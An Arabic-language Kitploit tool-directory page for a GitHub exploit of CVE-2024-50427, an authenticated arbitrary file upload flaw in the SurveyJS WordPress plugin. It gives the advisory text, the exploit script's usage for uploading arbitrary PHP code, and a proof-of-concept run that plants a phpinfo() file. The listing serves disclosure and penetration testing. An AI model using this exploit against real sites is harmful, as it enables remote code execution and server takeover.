Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-50427 — SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - مُصادَق عليه (Subscriber+) رفع ملفات تعسفي | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-50427
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2024-50427

CVE-2024-50427

SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - مُصادَق عليه (Subscriber+) رفع ملفات تعسفي

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-50427

SurveyJS: Drag & Drop منشئ نماذج WordPress <= 1.9.136 - رفع ملفات تعسفي للمستخدمين الموثَّقين (بصلاحية مشترك فأعلى)

الوصف:

المكون الإضافي SurveyJS: Drag & Drop منشئ نماذج WordPress لإنشاء وتنسيق وتضمين نماذج متعددة بأي تعقيد معرض لخطر رفع الملفات التعسفي بسبب نقص التحقق من نوع الملف في جميع الإصدارات حتى 1.9.136. وهذا يتيح للمهاجمين الموثَّقين، بصلاحية مشترك فأعلى، رفع ملفات تعسفي على خادم الموقع المتأثر مما قد يؤدي إلى تنفيذ كود عن بعد.

root@kitploit:~
Published: 2024-10-24 00:00:00
CVE: CVE-2024-50427
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: surveyjs

كيفية الاستخدام

root@kitploit:~
usage: CVE-2024-50427.py [-h] [--code CODE] url username password

Upload a PHP file to a WordPress site.

positional arguments:
  url          The URL of the WordPress site (e.g., http://example.com)
  username     Your WordPress username
  password     Your WordPress password

options:
  -h, --help   show this help message and exit
  --code CODE  PHP code to execute

إثبات المفهوم

root@kitploit:~
$ python3 CVE-2024-50427.py http://kubernetes.docker.internal [email protected] user --code "phpinfo();"
Login successful.
File uploaded successfully.
http://kubernetes.docker.internal/wp-content/uploads/surveyjs/158718452672e02bd1d7212.25114025.php
تنزيل الأداة